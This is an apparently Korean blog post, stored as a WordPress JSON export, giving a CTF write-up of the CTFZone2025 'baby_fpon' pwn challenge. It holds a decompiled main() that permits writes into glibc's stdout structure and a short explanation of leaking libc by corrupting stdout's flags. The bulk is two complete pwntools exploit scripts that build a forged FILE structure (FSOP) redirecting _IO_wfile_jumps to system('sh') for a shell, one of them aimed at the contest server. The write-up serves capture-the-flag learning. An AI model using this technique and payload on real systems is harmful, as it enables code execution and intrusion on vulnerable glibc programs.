{"id":3927,"date":"2025-08-18T11:06:55","date_gmt":"2025-08-18T02:06:55","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3927"},"modified":"2025-08-18T11:06:56","modified_gmt":"2025-08-18T02:06:56","slug":"ctfzone2025-baby_fpon-fsop","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3927","title":{"rendered":"[CTFZone2025] baby_fpon (FSOP)"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">checksec<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@735e623c0bf0:~\/study\/ctfzone2025\/fpon2$ checksec .\/fpon\n[*] '\/home\/ubuntu\/study\/ctfzone2025\/fpon2\/fpon'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    Stripped:   No\n<\/pre>\n\n\n\n<p>GOT Overwrite\uac00 \uac00\ub2a5\ud568.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Analysis \/ Decompiled-src<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">main<\/h3>\n\n\n\n<p>libc\uc758 stdout \uc8fc\uc18c\uc5d0 \uc788\ub294 \ub370\uc774\ud130\ub97c \ubcc0\uc870\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p>2\ubc14\uc774\ud2b8 \uc815\ub3c4 \uc218\uc815\uc774 \uac00\ub2a5\ud558\uba70, \uc774\ud6c4\uc5d0\ub294 \uc4f0\uc5ec\uc9c8 address\uc640 \uc4f8 \uac12\uc778 content\ub97c \uc81c\uacf5\ud574\uc900\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rdx\n  char v4; \/\/ al\n  _BYTE *v5; \/\/ rdx\n  __int64 v6; \/\/ rdx\n  unsigned __int8 user_uint8; \/\/ [rsp+Eh] [rbp-12h]\n  unsigned __int8 v9; \/\/ [rsp+Eh] 
[rbp-12h]\n  FILE *v10; \/\/ [rsp+10h] [rbp-10h]\n  void *buf; \/\/ [rsp+18h] [rbp-8h]\n\n  v10 = _bss_start;\n  user_uint8 = get_user_uint8(\"Offset: \", argv, envp);\n  v4 = get_user_uint8(\"Byte: \", argv, v3);\n  v5 = (char *)v10 + user_uint8;\n  *v5 = v4;\n  v9 = get_user_uint8(\"Offset: \", argv, v5);\n  *((_BYTE *)&amp;v10->_flags + v9) = get_user_uint8(\"Byte: \", argv, v6);\n  buf = (void *)get_user_uint64(\"Address: \");\n  printf(\"Content: \");\n  read(0, buf, 0x1000u);\n  puts(\"That's all\");\n  return 0;\n}\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>\uc774\uc804 LACTF2024\uc5d0\uc11c \ubcf4\uc558\ub358 flipma \ubb38\uc81c\uc5d0\uc11c stdout\uc744 2\ubc14\uc774\ud2b8 \uc218\uc815\ud574\uc11c \ub9ad\ud588\ub358 \uae30\uc5b5\uc774 \ub0ac\ub2e4.<\/p>\n\n\n\n<p>_IO_2_1_stdout_\u2192_flags\uc5d0 _IO_IS_APPENDING \ud50c\ub798\uadf8\uac00 \ucd94\uac00\uc2dc\ud0a4\uace0, _IO_2_1_stdout_\u2192_IO_write_base\uc5d0\uc11c \ud558\uc704 2\ubc88\uc9f8 \ubc14\uc774\ud2b8\ub97c \\x00\uc73c\ub85c \uc218\uc815\uc2dc\ud0a4\uba74,<\/p>\n\n\n\n<p>\ub300\ub7c9\uc758 libc \uad00\ub828 \uc8fc\uc18c\ub4e4\uc774 \ub9ad\ub41c\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"627\" height=\"300\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-4.png\" alt=\"\" class=\"wp-image-3929\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-4.png 627w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-4-300x144.png 300w\" sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/figure>\n\n\n\n<p>\uc774\ud6c4\uc5d0\ub294 FSOP\uc73c\ub85c \uc258\ub530\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"http:\/\/solve.py\">solve.py<\/a><\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" 
data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/env python3\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\n\np = process(\".\/fpon\")\n# p = remote(\"host3.dreamhack.games\", 10296)\ne = ELF('.\/fpon',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n# l = ELF('.\/libc_prob.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\ndef FSOP_struct(flags = 0, _IO_read_ptr = 0, _IO_read_end = 0, _IO_read_base = 0,\\\\\n_IO_write_base = 0, _IO_write_ptr = 0, _IO_write_end = 0, _IO_buf_base = 0, _IO_buf_end = 0,\\\\\n_IO_save_base = 0, _IO_backup_base = 0, _IO_save_end = 0, _markers= 0, _chain = 0, _fileno = 0,\\\\\n_flags2 = 0, _old_offset = 0, _cur_column = 0, _vtable_offset = 0, _shortbuf = 0, lock = 0,\\\\\n_offset = 0, _codecvt = 0, _wide_data = 0, _freeres_list = 0, _freeres_buf = 0,\\\\\n__pad5 = 0, _mode = 0, _unused2 = b\"\", vtable = 0, more_append = b\"\"):\n    \n    FSOP = p64(flags) + p64(_IO_read_ptr) + p64(_IO_read_end) + p64(_IO_read_base)\n    FSOP += p64(_IO_write_base) + p64(_IO_write_ptr) + p64(_IO_write_end)\n    FSOP += p64(_IO_buf_base) + p64(_IO_buf_end) + p64(_IO_save_base) + p64(_IO_backup_base) + p64(_IO_save_end)\n    FSOP += p64(_markers) + p64(_chain) + p32(_fileno) + p32(_flags2)\n    FSOP += p64(_old_offset) + p16(_cur_column) + p8(_vtable_offset) + p8(_shortbuf) + p32(0x0)\n    FSOP += p64(lock) + p64(_offset) + p64(_codecvt) + 
p64(_wide_data) + p64(_freeres_list) + p64(_freeres_buf)\n    FSOP += p64(__pad5) + p32(_mode)\n    if _unused2 == b\"\":\n        FSOP += b\"\\\\x00\"*0x14\n    else:\n        FSOP += _unused2[0x0:0x14].ljust(0x14, b\"\\\\x00\")\n    \n    FSOP += p64(vtable)\n    FSOP += more_append\n    return FSOP\n\nsla(\"Offset: \", str(1))\n\nsla(\"Byte: \", str(0x38))\n\nsla(\"Offset: \", str(8*4+1))\n\nsla(\"Byte: \", str(0x00))\n\nrl()\nleak = ru(\"Address: \")\nleak = leak[-64:]\nleak = leak[28:28+6]\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\n\nlibc_base = leak - l.sym._IO_2_1_stdin_\ninfo(f\"libc_base: {hex(libc_base)}\")\nl.address = libc_base\n\nfs = FileStructure(0)\nmarker = u64(b'CAFEBABE')\nfs._IO_save_end = marker\n_IO_save_end_off = bytes(fs) .index(p64(marker))\n\nFSOP = FSOP_struct(flags = u64(b\"\\\\x01\\\\x01;sh;\\\\x00\\\\x00\"), \\\\\n                   lock            = l.symbols['_IO_2_1_stdout_'] + 0x10, \\\\\n                   _IO_read_ptr    = 0x0, \\\\\n                   _IO_write_base  = 0x0, \\\\\n                   _wide_data      = l.symbols['_IO_2_1_stdout_'] - 0x10, \\\\\n                   _unused2        = p64(l.symbols['system'])+ b\"\\\\x00\"*4 + p64(l.symbols['_IO_2_1_stdout_'] + _IO_save_end_off + 4), \\\\\n                   vtable          = l.symbols['_IO_wfile_jumps'] - 0x20, \\\\\n                   )\n\nsl(str(l.sym._IO_2_1_stdout_))\n\ninfo(f\"FSOP payload len: {len(FSOP)}\")  \n\nsla(b\"Content: \", bytes(FSOP))\n\npi()\n\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"http:\/\/solve.py\">solve.py<\/a> (server)<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/env python3\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport 
sys\n\n# p = process(\".\/fpon\")\np = remote(\"baby_fpon.tasks.ctf.ad\", 32176)\n# p = remote(\"host3.dreamhack.games\", 10296)\ne = ELF('.\/fpon',checksec=False)\n# l = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\nl = ELF('.\/libc_prob.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\ndef FSOP_struct(flags = 0, _IO_read_ptr = 0, _IO_read_end = 0, _IO_read_base = 0,\\\\\n_IO_write_base = 0, _IO_write_ptr = 0, _IO_write_end = 0, _IO_buf_base = 0, _IO_buf_end = 0,\\\\\n_IO_save_base = 0, _IO_backup_base = 0, _IO_save_end = 0, _markers= 0, _chain = 0, _fileno = 0,\\\\\n_flags2 = 0, _old_offset = 0, _cur_column = 0, _vtable_offset = 0, _shortbuf = 0, lock = 0,\\\\\n_offset = 0, _codecvt = 0, _wide_data = 0, _freeres_list = 0, _freeres_buf = 0,\\\\\n__pad5 = 0, _mode = 0, _unused2 = b\"\", vtable = 0, more_append = b\"\"):\n    \n    FSOP = p64(flags) + p64(_IO_read_ptr) + p64(_IO_read_end) + p64(_IO_read_base)\n    FSOP += p64(_IO_write_base) + p64(_IO_write_ptr) + p64(_IO_write_end)\n    FSOP += p64(_IO_buf_base) + p64(_IO_buf_end) + p64(_IO_save_base) + p64(_IO_backup_base) + p64(_IO_save_end)\n    FSOP += p64(_markers) + p64(_chain) + p32(_fileno) + p32(_flags2)\n    FSOP += p64(_old_offset) + p16(_cur_column) + p8(_vtable_offset) + p8(_shortbuf) + p32(0x0)\n    FSOP += p64(lock) + p64(_offset) + p64(_codecvt) + p64(_wide_data) + p64(_freeres_list) + p64(_freeres_buf)\n    FSOP += p64(__pad5) + p32(_mode)\n    if _unused2 == b\"\":\n        FSOP += b\"\\\\x00\"*0x14\n    else:\n  
      FSOP += _unused2[0x0:0x14].ljust(0x14, b\"\\\\x00\")\n    \n    FSOP += p64(vtable)\n    FSOP += more_append\n    return FSOP\n\nsla(\"Offset: \", str(1))\n\nsla(\"Byte: \", str(0x38))\n\nsla(\"Offset: \", str(8*4+1))\n\nsla(\"Byte: \", str(0x00))\n\nrl()\nleak = ru(\"Address: \")\nleak = leak[-64:]\nleak = leak[28:28+6]\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\n\nlibc_base = leak - l.sym._IO_2_1_stdin_\ninfo(f\"libc_base: {hex(libc_base)}\")\nl.address = libc_base\n\nfs = FileStructure(0)\nmarker = u64(b'CAFEBABE')\nfs._IO_save_end = marker\n_IO_save_end_off = bytes(fs) .index(p64(marker))\n\nFSOP = FSOP_struct(flags = u64(b\"\\\\x01\\\\x01;sh;\\\\x00\\\\x00\"), \\\\\n                   lock            = l.symbols['_IO_2_1_stdout_'] + 0x10, \\\\\n                   _IO_read_ptr    = 0x0, \\\\\n                   _IO_write_base  = 0x0, \\\\\n                   _wide_data      = l.symbols['_IO_2_1_stdout_'] - 0x10, \\\\\n                   _unused2        = p64(l.symbols['system'])+ b\"\\\\x00\"*4 + p64(l.symbols['_IO_2_1_stdout_'] + _IO_save_end_off + 4), \\\\\n                   vtable          = l.symbols['_IO_wfile_jumps'] - 0x20, \\\\\n                   )\n\nsl(str(l.sym._IO_2_1_stdout_))\n\ninfo(f\"FSOP payload len: {len(FSOP)}\")    \n\nsla(b\"Content: \", bytes(FSOP))\n\npi()\n\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Result<\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1009\" height=\"654\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-3.png\" alt=\"\" class=\"wp-image-3928\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-3.png 1009w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-3-300x194.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-3-768x498.png 768w\" sizes=\"auto, (max-width: 1009px) 100vw, 1009px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>checksec GOT Overwrite\uac00 \uac00\ub2a5\ud568. 
Analysis \/ Decompiled-src main libc\uc758 stdout \uc8fc\uc18c\uc5d0 \uc788\ub294 \ub370\uc774\ud130\ub97c \ubcc0\uc870\uc2dc\ud0ac \uc218 \uc788\ub2e4. 2\ubc14\uc774\ud2b8 \uc815\ub3c4 \uc218\uc815\uc774 \uac00\ub2a5\ud558\uba70, \uc774\ud6c4\uc5d0\ub294 \uc4f0\uc5ec\uc9c8 address\uc640 \uc4f8 \uac12\uc778 content\ub97c \uc81c\uacf5\ud574\uc900\ub2e4. Solution \uc774\uc804 LACTF2024\uc5d0\uc11c \ubcf4\uc558\ub358 flipma \ubb38\uc81c\uc5d0\uc11c stdout\uc744 2\ubc14\uc774\ud2b8 \uc218\uc815\ud574\uc11c \ub9ad\ud588\ub358 \uae30\uc5b5\uc774 \ub0ac\ub2e4. _IO_2_1_stdout_\u2192_flags\uc5d0 _IO_IS_APPENDING \ud50c\ub798\uadf8\uac00 \ucd94\uac00\uc2dc\ud0a4\uace0, _IO_2_1_stdout_\u2192_IO_write_base\uc5d0\uc11c \ud558\uc704 2\ubc88\uc9f8 \ubc14\uc774\ud2b8\ub97c \\x00\uc73c\ub85c \uc218\uc815\uc2dc\ud0a4\uba74, \ub300\ub7c9\uc758 libc \uad00\ub828 \uc8fc\uc18c\ub4e4\uc774 \ub9ad\ub41c\ub2e4. \uc774\ud6c4\uc5d0\ub294&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3927\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[CTFZone2025] baby_fpon 
(FSOP)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[33,25],"class_list":["post-3927","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-fsop","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3927","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3927"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3927\/revisions"}],"predecessor-version":[{"id":3930,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3927\/revisions\/3930"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3927"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3927"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3927"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}